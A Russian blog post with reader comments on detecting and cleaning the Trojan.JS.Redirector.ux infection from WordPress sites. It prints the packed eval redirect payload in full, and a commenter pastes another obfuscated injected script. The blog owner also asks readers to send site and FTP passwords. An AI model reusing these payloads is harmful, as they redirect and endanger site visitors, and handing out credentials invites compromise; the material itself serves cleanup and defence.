Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого
Всем привет! Вот уж не думал, что снова встретимся! Да нет же, это я не вам, читатели «Первого блога альтруиста» — в нашей встрече я уверене, а новому вирусу, который называется Trojan.JS.Redirector.ux. Поражает он в основном сайты wordpress, а мне потом возись с ним. Но я-то думал, этот вирус новый, а он оказался тем же JS/RefC-Gen или Mal/Iframe-AD.
Как же я его узнал? Конечно же по вредоносному коду, который он в себе несет. Многие вирусы попадают к нам на сайт совершенно случайно, пробивают пороли FTP, а потом мануально (в ручную), но скорее всего автоматически, располагаются в удобном (вирусу) и неприметном (для нас) месте.
Обо всем по порядку, сначала пример кода, найдя который знайте — ваш сайт обязательно заражен Trojan.JS.Redirector.ux.
1 2 3 4 5 | <script type="text/javascript" language="\"JavaScript\"">// <![CDATA[ eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query ||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locatio n'.split('|'),0,{})) // ]]></script> |
или
1 | echo "<script type="text/javascript">// <![CDATA[ |
или
1 | add_sscounter() |
Как найти код вируса на сайте быстро?
1. Начинайте проверку с functions.php. Если код вируса есть, то скорее всего в самом низу файла. Также просмотрите сразу файл index.php.
Насчет index.php. Как вы знаете, такой файлик почти в каждой папке темы. Зачастую в нем написано всего лишь закомментированное «Silence is golden.» Но вот если index.php темы заражается, то заражаются все файлы index.php. Также это касается файлов с расширением .js.
2. Скачайте файлы темы wordpress на компьютер. Найдите скачанную папку Total Commander’ом. Кликните по ней правой клавишей мыши, выберите «Найти», далее «С текстом» и введите часть одного из кодов, описанных выше, например:
1 | p,a,c,k,e,r |
Внимание! Код в файле jquery.min.js — не вредоносный! Антивирус ClamAV постоянно называет этот абсолютно нормальный файл, как зараженный вирусом PUA.Script.Packed-1 или PUA.Script.Packed-2.
3. Самый брутальный, но очень действенный метод удаления вируса. Удаляем с хостинга все папки и файлы кроме:
— картинок и медиафайлов, вроде wp-content/uploads и image;
— robots.txt, .htaccess, sitemap.xml.gz, sitemap.xml и wp-config (не забываем проверить их на код);
— header.php, single.php и другие файлы темы, содержащие коды Яндекса, Google, Vkontakte и так далее (аналогично, проверяем на код вируса).
Потом перезаливаем wordpress, папку темы и закачиваем плагины. На всякий случай скачивал базы данных, проверял их, но не разу не находил там вирус. Готово.
Существует ряд ресурсов для проверки сайта на вирус, посоветую три:
1. http://www.virustotal.com/
2. http://antivirus-alarm.ru/proverka/
3. http://xseo.in/viruscan/
А как было у меня на этот раз?
Начнем с того, что две недели назад появился новый вирус wordpress Trojan.JS.Redirector.ux. Этому событию я уделил мало внимания, так как все мои сайты живы-здоровы и тема «удаление вируса с сайта wordress» хорошо раскрыта на «Первом блоге альтруиста».
И вот захожу я на один свой старенький сайт, который тоже вроде как жив-здоров, но касперский замечает в файлах-расцветках темы вредоносный код. Спокойно удаляю старую тему, нахожу более новую тему wordpress, заливаю ее на хостинг и несколько дней оптимизирую под контент сайта, а контент сайта делаю под тему.
Но через несколько дней, жму на RDS-бар, желая узнать дату последней индексации сайта гуглом, вместо даты стоит слово «Нет», нажав на которое, впадаю в ступор:
Выполнил все три пункта проверки, ни один из ресурсов проверки сайта не видит вирус, все вроде как хорошо, но… Включаю RDS-бар (на других сайтах работает исправно), жму на «Нет» индескации гугла и вижу картинку выше.
Только спустя несколько дней, понимаю, что вирус не на сайте, а в кэше (памяти) Google. Т.е. при последнем заходе, еще при «вирусной» теме поисковик запомнил, что сайт плох. А сайт бодр и здоров!
Чего желаю и вашим сайтам!
Все вопросы пишите в комментарии — с радостью отвечу. Буду благодарен, как и многие владельцы зараженных сайтов, за +1 или ретвит. А чтобы быть в курсе всех новостей сайта — подписывайтесь!
Удачи, пока.
Замечательная статья! Особо благодарна за вот эту пометку:
«Внимание! Код в файле jquery.min.js — не вредоносный! Антивирус ClamAV постоянно называет этот абсолютно нормальный файл, как зараженный вирусом PUA.Script.Packed-1 или PUA.Script.Packed-2.»
Я проверяла сайт с помощью ai-bolit и он мне кучу дряни нарыл, среди которой указал и этот код. Я его удалила и перестали нормально добавляться медиафайлы. Пришлось голову ломать,что же надо удалять. А тут ваша статья. Уф…прямо отлегло. Спасибо огромнейшее.
Скорее всего не добавили этот скрипт в фильтр. Хорошо, что статья вам помогла. Поздравляю со здоровыми сайтами.
Можно скаать все файлы сайта на компьютер, отключив резидентную защиту антивируса, а потом проверить их и посмотреть, в каких АВ найдет вирус. Правда он может не во всех найти, но сайт все равно детектировать.
Спасибо за подробную статью.
Столкнулся с тем-же заражением.
Нашел вредоносный код поиском p,a,c,k,e,r
Ну и Касперский также указал на файл jquery.js в папке: wp-includesjsjquery
Последняя строка в файле была от вируса.
Удалил — проблема ушла.
Но вопрос — как в принципе произошло заражение?
Куда копать, чтобы предотвратить повторение?
Пароль FTP сменил.
Что ещё стоит сделать?
Сносить сайт вчистую не хотелось бы — дюже файлов много.
На днях посетитель маякнул, что Касперский ругается на мой блог. В качестве причины указывает опасный веб-адрес.
Поиск по всем файлам сайта удобно проводить Notepad++ Да и редактировать код удобно.
По файлу — notepad++, по файлам — total commander.
Добавлю. Провел маленькое исследование — этот же код в дистрибутиве WP-3.5.1 на wordpress.org и двух российских — это совсем не понятно! Почему?
Возможно, этот код вовсе не вирусный, а используется в работе вордпресс.
Христос Воскресе! С праздником Великого Воскресения! (Сейчас идет служение…)
Спасибо за благословенную статью! Сайт у меня был взломан, скачал все на компьютер, прогнал несколькими антивирусами и антишпионами. Нашел shell вирус, и еще подозрительные файлы. Думал уже все убрал. Наткнулся на Ваш сайт, сделал поиск на наличие описанного кода (p,a,c,k,e,r), к своему удивлению обнаружил его в конце файла revisions-js.php в админе — wp-adminjsrevisions-js.php. Код немного отличается от описанного, поэтому у меня вопрос: какую часть скрипта удалять из ниже приведенного фрагмента – от « <script…» после и до следующего « » или до конца?
#hal { text-decoration: blink; }
/* <![CDATA[ */
var n = '$n';
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c—)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘6(4(){2 e=6(\’#Q\’).v();2 i=\’\\\’,.R/=\\\\S-;T»U?+|V:W[]X{}\’.u(\’\’);2 o=\’Y[]\\\\Z;\\\’10,./11{}|12:»13?-=14+\’.u(\’\’);2 5=4(s){r=\’\’;6.15(s.u(\’\’),4(){2 t=16.D();2 c=6.17(t,i);r+=\’$\’==t?n:(-1==c?t:o[c])});j r};2 a=[\’O.E[18 e.y.19.1a\’,\’1b 1c. 1d .1e.,1f 1g\’,\’O.E e.1h 1i 8\’,\’9\’,\’0\’];2 b=[\’0;g—){7(3==f.q[g-1].1W||\’1X\’==f.q[g-1].1Y.1Z()){f.20(f.q[g-1])}}};d(k,z)});’,62,125,’||var||function|tr|jQuery|if||||||setTimeout||pp|ppp|||return|hal||hal3||||childNodes||||split|hide|ll|history||3000|hal2|lll|2000|toString|nu|back|false|shift|undefined|typeof|show|4000|before|else||length|noscript|pyfgcrl|aoeuidhtns|qjkxbmwvz|PYFGCRL|AOEUIDHTNS_|QJKXBMWVZ|1234567890|qwertyuiop|asdfghjkl|zxcvbnm|QWERTYUIOP|ASDFGHJKL|ZXCVBNM|0987654321_|each|this|inArray|jrmlapcorb|jy|ev|Cbcycaycbi|cbucbcy|nrrl|ojd|an|lpryrjrnv|oypgjy|cbvvv|at|glw|vvv|Yd|Maypcq|dao|frgvvv|Urnnr|yd|dcy|paxxcyv|dan|dymn|keypress|27|keyCode|window|location|irxajt|attr|href|xajtiprgbeJrnrp|xnajt|jrnrp|ip|dymnw|xref|css|animate|opacity|linear|Wxp|zV|100|null|get|makeArray|reverse|for|nodeType|br|nodeName|toLowerCase|removeChild’.split(‘|’),0,{}))
/* ]]> */
$d
▌
EOEE
,
dvortr( ‘Eabi.p!’ )
);
Только что проверил сайт на вирус,спасибо что помогли)
я искал вредоносный код через этот скрипт http://secu.ru/scripts/find-and-replace, плюс в том что файлы не нужно выкачивать на компьютер, а код Trojan.JS.Redirector.ux находил прямо на сервере
Возможно удобный скрипт. А есть описание его работы? Статья на эту тему?
описание там же на сайте, статьи на эту тему пока нет
Пишите-пишите, не отвлекайтесь:)
Сначала спасибо за развёрнутую информацию, нашёл (p,a,c,k,e,r)
туточки: wp-adminjsrevisions-js.php
Но вот дилема, АAбсолютно такой же код в дистрибутиве WP-3.3.2-ru
и тут: wp-contentpluginssimple-countersjssc.min.js.Ну этот удавим.
И ещё если позволите вопрос: плагин AntiVirus в ручном режиме сканирования не работает,а на почту присылает «подозрение на вирус». Хотя проверял рекомендуемыми вами антивирами, никаких проблем.
Что делать….забить? или всё пере залить на хостинг?
Начнем с того, что проверить надо теперь все(!) файлы с расширением .js и все файлы index.php.
Желательно действовать по самому брутальному пути данного руководства.
спасибо! реально помогли!!! удалил из function.php вредоносный код, вроде все стало хорошо. как эта зараза туда залезла понять не могу! пролазил не один сайт по этой тематике.. толька га вашем внятно все расписано!!!
Будьте здоровы!
У Вас на сайте много хорошей и полезной информации — буду заходить в гости)
мне помог Ваш совет скачать все файлы и папки с хостинга на ПК — Касперский сразу показал в каких файлах сидит вирус — это оказались functions.php в темах, я бесплатно много тем накачала. сидел в конце файлов. Спасибо за Ваш сайт!
Плагины отключите подозрительные, там может быть. На FTP грохайте все подозрительные файлы — всякие там link, script.js.
Как радикальная мера — откат на другую тему или поиск вашей чистой темы, если вы используете бесплатный шаб
Письмо получено. Сейчас буду смотреть, ожидайте:)
Интересные файлы. Iframe сразу наводит на мысль о вирусе. Гораздо удобнее будет, если вы оставите в личном сообщении:
1)Имя сайта
2)Логин
3)Пароль
4)Желательно логин и пароль по FTP
Вот ссылка на форму обратной связи: http://blogalt.ru/svyazhites-so-mnoj
Гарантирую, что после проверки, ваш сайт останется вашим:)
5 штук — это таких файлов functions.php (но я их нашла не только в папках с темами — отовсюду)
А про тот файл в теме — посмотрела, нет ничего подозрительного, да и редактировался он в последний раз 2.10.11, а яндекс заблокировал меня только сейчас. К тому же, мой сайт не взламывали, чтобы злоумышленники могли поменять дату последнего изменения файла. Если хотите, могу выслать вам код данного файла. Но мне кажется что дело не в нём(((
Сделала сортировку файлов с датой последнего изменения за последние3 недели с помощью quick-search.php по шаблону:
$pattern[] = «‘fromCharCode’si»;
$pattern[] = «‘display:none’si»;
$pattern[] = «‘iframe’si»;
$pattern[] = «‘unescape’si»;
Вот список файлов, может, подскажите, где могут быть заражения?:
http://www.skolayspexa.ru/quick-search.php
Ваш сайт жив и здоров.
На сайте оказался обнаружено: троянская программа Exploit.SWF.Agent.gf, которая делала следующее:
1) Каждого посетителя принуждала запускать флеш-файл;
2) Этот файл связывался с компьютером посетителя и заражал его.
К сожалению не удалось сохранить код, но находился он здесь: «Внешний вид — Виджеты». Это был скрипт, одного из рекломодателей.
Таким не хитрым образом рекламщики не только платят копейки за показы и клики, но еще и заражают сайты.
Будьте осторожны и внимательны:)
СПАСИБО БОЛЬШОЕ!!!
Сама бы век искала — не нашла))) Интересно только, почему яндекс вычислил только одну страницу, а не все?
Напишу о Вас заметку (о сайте Вашем) на своём уже живом блоге и разошлю по базе подписчиков (как раз заодно надо уведомить своих подписчиков о том, что ресурс уже здоров).
Ещё раз БЛАГОДАРЮ!
Подписалась на Ваши обновления.
Я знаю, на какой странице сайта вордпресс есть вредоносный код, как мне эту страницу найти через фтп клиент, чтобы отредактировать? Подскажите пожалуйста…
Елена, дело тут не в странице, а в файлах темы. Скорее всего код находится в самом низу файла functions.php. Проверьте для начала его. Напишите, как справитесь.
Я таких файлов 5 штук нашла — это наормально. Но ничего подозрительного вроде нет. Но я чайник, поэтому могу и не увидеть
То есть: 5 штук — это нормально?? (я вопрос забыла поставить)
Имеется ввиду ваш_сайт/wp-content/themes/название_темы/functions.php. Там скорее всего зверь. В самом низу.
5 штук чего нашли? С этого места, если можно, подробнее.)
Постарайтесь описать все детально в течении пятницы, до обеда. А то уеду, а ваш сайт проболеет до понедельника.
пардон
вот так:
eval(edd19102);function ga8084a(t… много букв
Любой код, который вы в первый раз видите может быть вредоносным:)
Замочил сегодня подонка в function.php. Эта тварь несколько месяцев нервы мотала. И то не уверен, что полностью выздровел. Посмотрим дальше.
Трояны не боятся такой привычки как возвращаться. А еще — это бомбы замедленного действия. Он уже мог расползтись по остальным файлам темы. Поверьте и проверьте. Странно, а пару месяцев назад вы нас не смогли найти (я про blogalt.ru)?
Я по настоящему счастлив. Несколько дней к ряду страницы описанного выше сайта выдавали наличие вируса Trojan.JS.Redirector.ux. Об этом говорил google webcache. Однако сегодня поисковик наконец-то обновил кеш моей страницы и узнал о существовании новой чистой темы. Как же здорово, а!
Всем, кому помог и помогаю справится с вирусами на сайтах передаю огромный приветище и делюсь этой радостной новостью!
Сенк а лот, вируг (враг) не пройдёт!
Афигеть, не знал, что такой вирус есть. Спасибо, теперь буду знать
Будь осторожен, но особо не парься. Волны вирусов на сайт wordpress случаются 1-2 раза в год.
На мой сайт уже за последние 2-3 недели два раза ловила троянов за я*ца. Надеюсь больше их не увижу.
В случае чего — пишите. А так — читайте статью. Это я как ловец ловцу вам советую:)
Кажется меня опять посетил вирус — но я об этом узнаю от пользователей. Что делать? Опять к фрилансеру обращаться или вы сможете помочь?
Если вы располагаете временем, то сделайте сами. Или парня (мужа) пригласите в гости знакомого, покажите статью — все вам сделает.
Как вариант, спросить о помощи фриленсера, который вам помогал.
+1 за статью. Раздел про вирусы — понравился. Хороший, много информации. Сайт не думали создать по вирусам, ushi?)
Спасибо!
Думал:)
Но уже есть ряд неплохих ресурсов, даже бесплатных. А то, что у меня получилось лечить сайт от вируса раньше программ — случайность. Не зарази мой сайт — не личил бы.
Так что достаточно рубрики «Антивирус wordpress».
Может Касперский глючит? Потому что тот же nod не находит вируса на сайте, а касперыч крякает и банит?
Обычно Касперский первый все находит. Еще мало кто знает, еще не появился биохазард в вебмастере, а Каспер — уже предупреждает. Предупрежден — значит вооружен:)
А каспер, наверно, сам распространяет втихаря заразу, а потом первый и предупреждает об этом)))) Поэтому и первый всегда)))
Была и таая мысль:)
Может было бы и похоже на правду, так хоть бы описание давал, а то «Ваш сайт зараэжен» и в том же духе.